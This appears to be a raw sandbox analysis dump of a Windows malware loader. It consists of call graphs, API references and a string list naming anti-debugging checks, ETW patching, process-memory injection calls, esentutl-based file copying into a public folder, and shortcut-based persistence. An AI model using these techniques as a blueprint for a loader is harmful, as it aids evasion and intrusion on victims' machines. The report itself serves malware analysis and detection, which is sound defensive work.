37197 2ec89e0 19 API calls 37193->37197 37196 2eb4860 11 API calls 37194->37196 37198 2eb47ec 11 API calls 37195->37198 37201 2eda2f8 37196->37201 37199 2ed6c35 37197->37199 37203 2ed8d94 37198->37203 37200 2eb4860 11 API calls 37199->37200 37204 2ed6c56 37200->37204 37202 2eb47ec 11 API calls 37201->37202 37208 2eda32f 37202->37208 37205 2ec89e0 19 API calls 37203->37205 37207 2eb47ec 11 API calls 37204->37207 37206 2ed8db8 37205->37206 37209 2eb4860 11 API calls 37206->37209 37211 2ed6c8d 37207->37211 37210 2ec89e0 19 API calls 37208->37210 37214 2ed8dd9 37209->37214 37212 2eda353 37210->37212 37215 2ec89e0 19 API calls 37211->37215 37213 2eb4860 11 API calls 37212->37213 37218 2eda374 37213->37218 37216 2eb47ec 11 API calls 37214->37216 37217 2ed6cb1 37215->37217 37221 2ed8e10 37216->37221 37219 2eb4860 11 API calls 37217->37219 37220 2eb47ec 11 API calls 37218->37220 37224 2ed6cf1 37219->37224 37225 2eda3ab 37220->37225 37222 2ec89e0 19 API calls 37221->37222 37223 2ed8e34 37222->37223 37226 2eb4860 11 API calls 37223->37226 37227 2eb47ec 11 API calls 37224->37227 37228 2ec89e0 19 API calls 37225->37228 37231 2ed8e55 37226->37231 37232 2ed6d28 37227->37232 37229 2eda3cf 37228->37229 37230 2eb4860 11 API calls 37229->37230 37236 2eda3f0 37230->37236 37233 2eb47ec 11 API calls 37231->37233 37234 2ec89e0 19 API calls 37232->37234 37237 2ed8e8c 37233->37237 37235 2ed6d4c 37234->37235 37239 2eb4860 11 API calls 37235->37239 37238 2eb47ec 11 API calls 37236->37238 37240 2ec89e0 19 API calls 37237->37240 37242 2eda427 37238->37242 37245 2ed6d7b 37239->37245 37241 2ed8eb0 CloseHandle 37240->37241 37243 2eb4860 11 API calls 37241->37243 37244 2ec89e0 19 API calls 37242->37244 37247 2ed8edc 37243->37247 37250 2eda44b 37244->37250 38198 2eb79a0 11 API calls 37245->38198 37251 2eb47ec 11 API calls 37247->37251 37248 2ed6da5 37249 2eb47ec 11 API calls 37248->37249 37252 2ed6dbb 37249->37252 37253 2ec89e0 19 API calls 37250->37253 37255 2ed8f13 37251->37255 37254 2eb4860 11 API calls 37252->37254 37257 2eda47e 37253->37257 37259 2ed6dec 37254->37259 37256 2ec89e0 19 API calls 37255->37256 37258 2ed8f37 37256->37258 37260 2ec89e0 19 API calls 37257->37260 37261 2eb4860 11 API calls 37258->37261 37262 2eb47ec 11 API calls 37259->37262 37263 2eda4b1 37260->37263 37264 2ed8f58 37261->37264 37265 2ed6e23 37262->37265 37266 2ec89e0 19 API calls 37263->37266 37267 2eb47ec 11 API calls 37264->37267 37268 2ec89e0 19 API calls 37265->37268 37271 2eda4e4 37266->37271 37272 2ed8f8f 37267->37272 37269 2ed6e47 37268->37269 37270 2eb4860 11 API calls 37269->37270 37276 2ed6e68 37270->37276 37274 2ec89e0 19 API calls 37271->37274 37273 2ec89e0 19 API calls 37272->37273 37275 2ed8fb3 37273->37275 37277 2eda517 37274->37277 37278 2eb4860 11 API calls 37275->37278 37280 2eb47ec 11 API calls 37276->37280 37279 2eb4860 11 API calls 37277->37279 37282 2ed8fd4 37278->37282 37281 2eda538 37279->37281 37283 2ed6e9f 37280->37283 37284 2eb47ec 11 API calls 37281->37284 37285 2eb47ec 11 API calls 37282->37285 37286 2ec89e0 19 API calls 37283->37286 37288 2eda56f 37284->37288 37289 2ed900b 37285->37289 37287 2ed6ec3 37286->37287 38199 2eb79a0 11 API calls 37287->38199 37292 2ec89e0 19 API calls 37288->37292 37293 2ec89e0 19 API calls 37289->37293 37291 2ed6ed9 37294 2eb47ec 11 API calls 37291->37294 37295 2eda593 37292->37295 37296 2ed902f 37293->37296 37298 2ed6eef 37294->37298 37299 2eb4860 11 API calls 37295->37299 37297 2eb4860 11 API calls 37296->37297 37302 2ed9050 37297->37302 37300 2eb4860 11 API calls 37298->37300 37301 2eda5b4 37299->37301 37305 2ed6f20 37300->37305 37303 2eb47ec 11 API calls 37301->37303 37304 2eb47ec 11 API calls 37302->37304 37307 2eda5eb 37303->37307 37308 2ed9087 37304->37308 37306 2eb47ec 11 API calls 37305->37306 37311 2ed6f57 37306->37311 37309 2ec89e0 19 API calls 37307->37309 37310 2ec89e0 19 API calls 37308->37310 37316 2eda60f 37309->37316 37312 2ed90ab 37310->37312 37314 2ec89e0 19 API calls 37311->37314 37313 2eb4860 11 API calls 37312->37313 37318 2ed90cc 37313->37318 37315 2ed6f7b 37314->37315 37317 2eb4860 11 API calls 37315->37317 37319 2ec89e0 19 API calls 37316->37319 37321 2ed6f9c 37317->37321 37320 2eb47ec 11 API calls 37318->37320 37322 2eda642 37319->37322 37325 2ed9103 37320->37325 37323 2eb47ec 11 API calls 37321->37323 37324 2ec89e0 19 API calls 37322->37324 37328 2ed6fd3 37323->37328 37329 2eda675 37324->37329 37326 2ec89e0 19 API calls 37325->37326 37327 2ed9127 37326->37327 37330 2eb4860 11 API calls 37327->37330 37331 2ec89e0 19 API calls 37328->37331 37333 2ec89e0 19 API calls 37329->37333 37335 2ed9148 37330->37335 37332 2ed6ff7 37331->37332 37334 2eb4860 11 API calls 37332->37334 37337 2eda6a8 37333->37337 37338 2ed7031 37334->37338 37336 2eb47ec 11 API calls 37335->37336 37340 2ed917f 37336->37340 37339 2ec89e0 19 API calls 37337->37339 37762 2ec4de4 37338->37762 37341 2eda6db 37339->37341 37342 2ec89e0 19 API calls 37340->37342 37345 2ec89e0 19 API calls 37341->37345 37344 2ed91a3 37342->37344 37346 2eb4860 11 API calls 37344->37346 37347 2eda70e 37345->37347 37349 2ed91c4 37346->37349 37348 2eb4860 11 API calls 37347->37348 37351 2eda72f 37348->37351 37350 2eb47ec 11 API calls 37349->37350 37353 2ed91fb 37350->37353 37352 2eb47ec 11 API calls 37351->37352 37354 2eda766 37352->37354 37355 2ec89e0 19 API calls 37353->37355 37357 2ec89e0 19 API calls 37354->37357 37358 2eda78a 37357->37358 37359 2eb4860 11 API calls 37358->37359 37364 2eda7ab 37359->37364 37368 2eb47ec 11 API calls 37364->37368 37372 2eda7e2 37368->37372 37375 2ec89e0 19 API calls 37372->37375 37377 2eda806 37375->37377 37378 2eb4860 11 API calls 37377->37378 37380 2eda827 37378->37380 37382 2eb47ec 11 API calls 37380->37382 37385 2eda85e 37382->37385 37387 2ec89e0 19 API calls 37385->37387 37389 2eda882 37387->37389 37390 2eb4860 11 API calls 37389->37390 37392 2eda8a3 37390->37392 37394 2eb47ec 11 API calls 37392->37394 37397 2eda8da 37394->37397 37398 2ec89e0 19 API calls 37397->37398 37399 2eda8fe 37398->37399 37537 2ecf0bd 37533->37537 37534 2ecf0e9 37536 2eb44dc 11 API calls 37534->37536 37538 2ecf0fe 37536->37538 37537->37534 38225 2eb46c4 11 API calls 37537->38225 38226 2eb4530 11 API calls 37537->38226 37538->35998 37541 2eb4bcc 11 API calls 37540->37541 37542 2ece374 37541->37542 37543 2ece395 37542->37543 37544 2eb49f8 11 API calls 37542->37544 37543->36032 37544->37542 37546 2ecdca6 37545->37546 38227 2eb4f20 37546->38227 37548 2ecdcae 37549 2ecdcce RtlD 37548->37549 38231 2ecdbe0 37549->38231 37551 2ecdcea NtCreateFile 37552 2ecdd15 37551->37552 37553 2eb49f8 11 API calls 37552->37553 37554 2ecdd27 NtWriteFile NtClose 37553->37554 37555 2ecdd51 37554->37555 38232 2eb4c60 37555->38232 37558 2eb44dc 11 API calls 37559 2ecdd61 Sleep 37558->37559 37559->36036 37561 2ece685 37560->37561 37561->37561 37562 2eb4860 11 API calls 37561->37562 37563 2ece6ce 37562->37563 37564 2eb47ec 11 API calls 37563->37564 37565 2ece6f3 37564->37565 37566 2ec89e0 19 API calls 37565->37566 37567 2ece70e 37566->37567 37568 2eb4860 11 API calls 37567->37568 37569 2ece727 37568->37569 37570 2eb47ec 11 API calls 37569->37570 37571 2ece74c 37570->37571 37572 2ec89e0 19 API calls 37571->37572 37573 2ece767 37572->37573 37574 2eb4860 11 API calls 37573->37574 37575 2ece780 37574->37575 37576 2eb47ec 11 API calls 37575->37576 37577 2ece7a5 37576->37577 37578 2ec89e0 19 API calls 37577->37578 37579 2ece7c0 37578->37579 37580 2eb4860 11 API calls 37579->37580 37581 2ece7f2 37580->37581 37582 2ec89e0 19 API calls 37581->37582 37583 2ece83c 37582->37583 37584 2eb4860 11 API calls 37583->37584 37585 2ece873 37584->37585 37586 2eb47ec 11 API calls 37585->37586 37587 2ece898 37586->37587 37588 2ec89e0 19 API calls 37587->37588 37589 2ece8b3 37588->37589 37590 2eb4860 11 API calls 37589->37590 37591 2ece8cc 37590->37591 37592 2eb47ec 11 API calls 37591->37592 37593 2ece8f1 37592->37593 37594 2ec89e0 19 API calls 37593->37594 37595 2ece90c 37594->37595 37596 2eb4860 11 API calls 37595->37596 37597 2ece925 37596->37597 37598 2eb47ec 11 API calls 37597->37598 37599 2ece94a 37598->37599 37600 2ec89e0 19 API calls 37599->37600 37601 2ece965 37600->37601 38235 2eb7f3c 37601->38235 37603 2ece989 38239 2ec8798 37603->38239 37606 2eb4860 11 API calls 37607 2ecea0e 37606->37607 37608 2eb47ec 11 API calls 37607->37608 37609 2ecea3f 37608->37609 37610 2ec89e0 19 API calls 37609->37610 37611 2ecea63 37610->37611 37612 2eb4860 11 API calls 37611->37612 37613 2ecea7f 37612->37613 37614 2eb47ec 11 API calls 37613->37614 37615 2eceab0 37614->37615 37616 2ec89e0 19 API calls 37615->37616 37617 2ecead4 37616->37617 37618 2eb4860 11 API calls 37617->37618 37619 2eceaf0 37618->37619 37620 2eb47ec 11 API calls 37619->37620 37621 2eceb21 37620->37621 37622 2ec89e0 19 API calls 37621->37622 37623 2eceb45 37622->37623 37624 2eb4860 11 API calls 37623->37624 37625 2eceb61 37624->37625 37626 2eb47ec 11 API calls 37625->37626 37627 2eceb7f 37626->37627 37628 2ec895c 21 API calls 37627->37628 37629 2eceb94 37628->37629 37630 2eb4860 11 API calls 37629->37630 37631 2ecebb0 37630->37631 37632 2eb47ec 11 API calls 37631->37632 37633 2ecebce 37632->37633 37634 2ec895c 21 API calls 37633->37634 37635 2ecebe3 37634->37635 37636 2eb4860 11 API calls 37635->37636 37637 2ecebff 37636->37637 37638 2eb47ec 11 API calls 37637->37638 37639 2ecec1d 37638->37639 37640 2ec895c 21 API calls 37639->37640 37641 2ecec32 37640->37641 37642 2eb4860 11 API calls 37641->37642 37643 2ecec4e 37642->37643 37644 2eb47ec 11 API calls 37643->37644 37645 2ecec6c 37644->37645 37646 2ec895c 21 API calls 37645->37646 37647 2ecec81 37646->37647 37648 2ecec8b 37647->37648 37649 2eceee6 37647->37649 37650 2eb4860 11 API calls 37648->37650 37651 2eb4500 11 API calls 37649->37651 37655 2ececa7 37650->37655 37652 2ecef03 37651->37652 37653 2eb4c60 SysFreeString 37652->37653 37654 2ecef0e 37653->37654 37656 2eb4500 11 API calls 37654->37656 37658 2eb47ec 11 API calls 37655->37658 37657 2ecef1e 37656->37657 37659 2eb4c60 SysFreeString 37657->37659 37662 2ececd8 37658->37662 37660 2ecef26 37659->37660 37661 2eb4500 11 API calls 37660->37661 37663 2ecef33 37661->37663 37664 2ec89e0 19 API calls 37662->37664 37663->36056 37665 2ececfc 37664->37665 37666 2eb4860 11 API calls 37665->37666 37667 2eced18 37666->37667 37668 2eb47ec 11 API calls 37667->37668 37669 2eced49 37668->37669 37670 2ec89e0 19 API calls 37669->37670 37671 2eced6d WaitForSingleObject CloseHandle CloseHandle 37670->37671 37672 2eb4860 11 API calls 37671->37672 37673 2eceda4 37672->37673 37674 2eb47ec 11 API calls 37673->37674 37675 2ecedc2 37674->37675 37676 2ec895c 21 API calls 37675->37676 37677 2ecedd7 37676->37677 37678 2eb4860 11 API calls 37677->37678 37679 2ecedf3 37678->37679 37680 2eb47ec 11 API calls 37679->37680 37681 2ecee11 37680->37681 37682 2ec895c 21 API calls 37681->37682 37683 2ecee26 37682->37683 37684 2eb4860 11 API calls 37683->37684 37685 2ecee42 37684->37685 37686 2eb47ec 11 API calls 37685->37686 37687 2ecee60 37686->37687 37688 2ec895c 21 API calls 37687->37688 37689 2ecee75 37688->37689 37690 2eb4860 11 API calls 37689->37690 37691 2ecee91 37690->37691 37692 2eb47ec 11 API calls 37691->37692 37693 2eceeaf 37692->37693 37694 2ec895c 21 API calls 37693->37694 37695 2eceec4 37694->37695 37696 2ec895c 21 API calls 37695->37696 37697 2eceed5 37696->37697 37698 2ec895c 21 API calls 37697->37698 37698->37649 37700 2eb49a4 37699->37700 37700->36078 37702 2ec89cb 37701->37702 37703 2ec8983 GetProcAddress 37701->37703 37702->36138 37704 2ec899d 37703->37704 37705 2ec89c0 FreeLibrary 37703->37705 37706 2ec7d88 18 API calls 37704->37706 37705->37702 37707 2ec89b5 37706->37707 37707->37705 37709 2eb4f20 SysAllocStringLen 37708->37709 37710 2ecdc1a RtlInitUnicodeString 37709->37710 37712 2ecdc3e 37710->37712 37713 2ecdc45 RtlD 37712->37713 38263 2ecdbe0 37713->38263 37715 2ecdc61 NtDeleteFile 37716 2ecdc79 37715->37716 37717 2eb4c60 SysFreeString 37716->37717 37718 2ecdc81 37717->37718 37718->36376 37729 2ece3be 37719->37729 37720 2ece460 37721 2eb4bcc 11 API calls 37720->37721 37722 2ece475 37721->37722 37723 2eb4530 11 API calls 37722->37723 37725 2ece480 37723->37725 37727 2eb44dc 11 API calls 37725->37727 37728 2ece495 37727->37728 37730 2eb4500 11 API calls 37728->37730 37729->37720 38264 2eb46c4 11 API calls 37729->38264 38265 2eb4530 11 API calls 37729->38265 37731 2ece4a2 37730->37731 37731->36457 37733 2eb7aec 37732->37733 37734 2eb7b0d 37733->37734 38266 2eb7670 42 API calls 37733->38266 37736 2ecf170 37734->37736 37737 2ecf18d 37736->37737 37738 2ecf1eb 37737->37738 38267 2eb46c4 11 API calls 37737->38267 38268 2eb4530 11 API calls 37737->38268 37740 2eb44dc 11 API calls 37738->37740 37741 2ecf200 37740->37741 37743 2eb44dc 11 API calls 37741->37743 37744 2ecf208 37743->37744 37744->36475 37746 2eb4530 11 API calls 37745->37746 37747 2ecf120 37746->37747 37748 2ecf167 37747->37748 37749 2eb49f8 11 API calls 37747->37749 37748->36505 37749->37747 37751 2eb4530 11 API calls 37750->37751 37752 2ec85ef 37751->37752 37753 2eb4860 11 API calls 37752->37753 37754 2ec860e 37753->37754 37755 2ec81dc 17 API calls 37754->37755 37756 2ec8621 37755->37756 37757 2ec8284 15 API calls 37756->37757 37758 2ec8627 WinExec 37757->37758 37759 2ec8649 37758->37759 37760 2eb44dc 11 API calls 37759->37760 37761 2ec8651 37760->37761 37761->36843 38269 2ec5bf8 37762->38269 38306 2ecad9c 37767->38306 37769 2ecae39 38311 2ecadbc 37769->38311 37771 2eb4500 11 API calls 37773 2ecaf14 37771->37773 37772 2ecae54 37774 2ecaeb7 CompareStringA 37772->37774 37775 2ecaed0 37772->37775 38316 2ecaddc 18 API calls 37772->38316 37773->36750 37774->37772 37774->37775 37775->37771 37778 2ecb124 37777->37778 37778->37778 37779 2eb4860 11 API calls 37778->37779 37780 2ecb164 37779->37780 37781 2eb47ec 11 API calls 37780->37781 37782 2ecb189 37781->37782 37783 2ec89e0 19 API calls 37782->37783 37784 2ecb1a4 37783->37784 37785 2eb4860 11 API calls 37784->37785 37786 2ecb1bd 37785->37786 37787 2eb47ec 11 API calls 37786->37787 37788 2ecb1e2 37787->37788 37789 2ec89e0 19 API calls 37788->37789 37790 2ecb1fd 37789->37790 37791 2eb4860 11 API calls 37790->37791 37792 2ecb216 37791->37792 37793 2eb47ec 11 API calls 37792->37793 37794 2ecb23b 37793->37794 37795 2ec89e0 19 API calls 37794->37795 37796 2ecb256 37795->37796 37797 2eb4860 11 API calls 37796->37797 37798 2ecb26f 37797->37798 37799 2eb47ec 11 API calls 37798->37799 37800 2ecb294 37799->37800 37801 2ec89e0 19 API calls 37800->37801 37802 2ecb2af 37801->37802 37803 2eb4860 11 API calls 37802->37803 37804 2ecb2cc 37803->37804 37805 2eb47ec 11 API calls 37804->37805 37806 2ecb2f1 37805->37806 37807 2ec89e0 19 API calls 37806->37807 37808 2ecb30c 37807->37808 37809 2eb4860 11 API calls 37808->37809 37810 2ecb34b 37809->37810 37811 2eb47ec 11 API calls 37810->37811 37812 2ecb370 37811->37812 37813 2ec89e0 19 API calls 37812->37813 37814 2ecb38b 37813->37814 37815 2eb4860 11 API calls 37814->37815 37816 2ecb3a4 37815->37816 37817 2eb47ec 11 API calls 37816->37817 37818 2ecb3c9 37817->37818 37819 2ec89e0 19 API calls 37818->37819 38195 2eb49a0 38194->38195 38196 2eb7e76 GetFileAttributesA 38195->38196 38197 2eb7e81 38196->38197 38197->36542 38197->36551 38198->37248 38199->37291 38201 2ec5b09 38200->38201 38203 2ec5b2a 38200->38203 38201->38203 38349 2ebb058 42 API calls 38201->38349 38203->36947 38205 2eb49ac 38204->38205 38206 2eb49e7 38205->38206 38207 2eb45a0 11 API calls 38205->38207 38210 2ec7e60 38206->38210 38208 2eb49c3 38207->38208 38208->38206 38350 2eb2c2c 11 API calls 38208->38350 38211 2eb4530 11 API calls 38210->38211 38212 2ec7e82 38211->38212 38213 2eb4860 11 API calls 38212->38213 38214 2ec7ebd 38213->38214 38215 2ec81dc 17 API calls 38214->38215 38216 2ec7ed0 38215->38216 38217 2ec8284 15 API calls 38216->38217 38218 2ec7ed6 RtlMoveMemory 38217->38218 38219 2ec7efa 38218->38219 38220 2eb44dc 11 API calls 38219->38220 38221 2ec7f02 38220->38221 38221->37020 38222->36952 38223->37080 38224->36764 38225->37537 38226->37537 38228 2eb4f3c 38227->38228 38229 2eb4f26 SysAllocStringLen 38227->38229 38228->37548 38229->38228 38230 2eb4c30 38229->38230 38230->38227 38231->37551 38233 2eb4c66 SysFreeString 38232->38233 38234 2eb4c74 38232->38234 38233->38234 38234->37558 38236 2eb7f4f 38235->38236 38251 2eb4a00 38236->38251 38240 2eb4530 11 API calls 38239->38240 38241 2ec87bb 38240->38241 38242 2eb4860 11 API calls 38241->38242 38243 2ec87da 38242->38243 38244 2ec81dc 17 API calls 38243->38244 38245 2ec87ed 38244->38245 38246 2ec8284 15 API calls 38245->38246 38247 2ec87f3 CreateProcessAsUserW 38246->38247 38248 2ec8837 38247->38248 38249 2eb44dc 11 API calls 38248->38249 38250 2ec883f 38249->38250 38250->37606 38252 2eb4a32 38251->38252 38253 2eb4a05 38251->38253 38254 2eb44dc 11 API calls 38252->38254 38253->38252 38255 2eb4a19 38253->38255 38257 2eb4a28 38254->38257 38258 2eb45cc 38255->38258 38257->37603 38259 2eb45a0 11 API calls 38258->38259 38260 2eb45dc 38259->38260 38261 2eb44dc 11 API calls 38260->38261 38262 2eb45f4 38261->38262 38262->38257 38263->37715 38264->37729 38265->37729 38266->37734 38267->37737 38268->37737 38270 2ec5c01 38269->38270 38317 2ecab20 38306->38317 38309 2ecadab CreateToolhelp32Snapshot 38309->37769 38310 2ecadb6 38310->37769 38312 2ecab20 17 API calls 38311->38312 38313 2ecadc7 38312->38313 38314 2ecadcb Process32First 38313->38314 38315 2ecadd6 38313->38315 38314->37772 38315->37772 38316->37772 38318 2ecab2f GetModuleHandleA 38317->38318 38320 2ecac64 38317->38320 38319 2ecab44 16 API calls 38318->38319 38318->38320 38319->38320 38320->38309 38320->38310 38349->38203 38350->38206
                                                                  APIs
                                                                  • InetIsOffline.URL(00000000,00000000,02EDB788,?,?,?,00000000,00000000), ref: 02ECF805
                                                                    • Part of subcall function 02ECF6EC: GetModuleHandleW.KERNEL32(KernelBase,?,02ECFAEF,UacInitialize,02F37380,02EDB7BC,OpenSession,02F37380,02EDB7BC,ScanBuffer,02F37380,02EDB7BC,ScanString,02F37380,02EDB7BC,Initialize), ref: 02ECF6F2
                                                                    • Part of subcall function 02ECF6EC: GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 02ECF704
                                                                    • Part of subcall function 02ECF748: GetModuleHandleW.KERNEL32(KernelBase), ref: 02ECF758
                                                                    • Part of subcall function 02ECF748: GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 02ECF76A
                                                                    • Part of subcall function 02ECF748: CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 02ECF781
                                                                    • Part of subcall function 02EB7E6C: GetFileAttributesA.KERNEL32(00000000,?,02ED0423,ScanString,02F37380,02EDB7BC,OpenSession,02F37380,02EDB7BC,ScanString,02F37380,02EDB7BC,UacScan,02F37380,02EDB7BC,UacInitialize), ref: 02EB7E77
                                                                    • Part of subcall function 02EBC374: GetModuleFileNameA.KERNEL32(00000000,?,00000105,0302B8B8,?,02ED0755,ScanBuffer,02F37380,02EDB7BC,OpenSession,02F37380,02EDB7BC,ScanBuffer,02F37380,02EDB7BC,OpenSession), ref: 02EBC38B
                                                                    • Part of subcall function 02ECDD74: RtlD.N(00000000,?,00000000,00000000,00000000,02ECDE44), ref: 02ECDDAF
                                                                    • Part of subcall function 02ECDD74: NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,02ECDE44), ref: 02ECDDDF
                                                                    • Part of subcall function 02ECDD74: NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 02ECDDF4
                                                                    • Part of subcall function 02ECDD74: NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 02ECDE20
                                                                    • Part of subcall function 02ECDD74: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 02ECDE29
                                                                    • Part of subcall function 02EB7E90: GetFileAttributesA.KERNEL32(00000000,?,02ED3573,ScanString,02F37380,02EDB7BC,OpenSession,02F37380,02EDB7BC,ScanBuffer,02F37380,02EDB7BC,OpenSession,02F37380,02EDB7BC,Initialize), ref: 02EB7E9B
                                                                    • Part of subcall function 02EB8058: CreateDirectoryA.KERNEL32(00000000,00000000,?,02ED3711,OpenSession,02F37380,02EDB7BC,ScanString,02F37380,02EDB7BC,Initialize,02F37380,02EDB7BC,ScanString,02F37380,02EDB7BC), ref: 02EB8065
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1427879050.0000000002EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1427857534.0000000002EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.000000000302B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.000000000302E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2eb0000_1m181Ru74o.jbxd
                                                                  Similarity
                                                                  • API ID: File$Module$AddressAttributesHandleProc$CheckCloseCreateDebuggerDirectoryInetInformationNameOfflineOpenPresentQueryReadRemote
                                                                  • String ID: /d $ /o$.url$Advapi$BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$C:\Users\Public\$C:\Windows\System32\$C:\\Users\\Public\\Libraries\\$C:\\Windows\\System32\\esentutl.exe /y $CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPGetInfo$CryptSIPGetSignedDataMsg$CryptSIPVerifyIndirectData$D2^Tyj}~TVrgoij[Dkcxn}dmu$DllGetActivationFactory$DllGetClassObject$DllRegisterServer$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FindCertsByIssuer$FlushInstructionCache$GET$GZmMS1j$GetProcessMemoryInfo$GetProxyDllInfo$HotKey=$I_QueryTagInformation$IconIndex=$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MZP$MiniDumpReadDumpStream$MiniDumpWriteDump$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$TrustOpenStores$URL=file:"$UacInitialize$UacScan$UacUninitialize$VirtualAlloc$VirtualAllocEx$VirtualProtect$WinHttp.WinHttpRequest.5.1$WintrustAddActionID$WriteVirtualMemory$[InternetShortcut]$acS$advapi32$bcrypt$can$dbgcore$endpointdlp$http$ieproxy$kernel32$mssip32$ntdll$psapi$psapi$smartscreenps$spp$sppc$sppwmi$tquery$wintrust
                                                                  • API String ID: 633443117-2644593349
                                                                  • Opcode ID: 801977a73231d5fc602b2c3cf8da324e7a7439c19e0e3b1d79d0f5c0129191ed
                                                                  • Instruction ID: 5586ac09c4d1d0357459f04ceb594ee11545345ffa15f413673ddc57f76b8c4e
                                                                  • Opcode Fuzzy Hash: 801977a73231d5fc602b2c3cf8da324e7a7439c19e0e3b1d79d0f5c0129191ed
                                                                  • Instruction Fuzzy Hash: 9114FF34A8012D8BDB12EB64D991ADF73BAFF85304F10D1A9F409AB255DB30AE42CF55

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 6027 2ecb11c-2ecb11f 6028 2ecb124-2ecb129 6027->6028 6028->6028 6029 2ecb12b-2ecb7b4 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2ec85a4 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 GetModuleHandleW call 2ec8284 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 NtOpenProcess call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb2ee0 call 2eb2f08 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 6028->6029 6248 2eccd2d-2eccf63 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2ec895c * 3 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2ec895c * 4 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 6029->6248 6249 2ecb7ba-2ecb934 GetCurrentProcess call 2ec7a3c call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 6029->6249 6386 2eccf68-2eccfa5 call 2eb4500 * 3 6248->6386 6249->6248 6341 2ecb93a-2ecb96a call 2ec5904 IsBadReadPtr 6249->6341 6341->6248 6353 2ecb970-2ecb975 6341->6353 6353->6248 6355 2ecb97b-2ecb997 IsBadReadPtr 6353->6355 6355->6248 6357 2ecb99d-2ecb9a6 6355->6357 6357->6248 6359 2ecb9ac-2ecb9d2 6357->6359 6359->6248 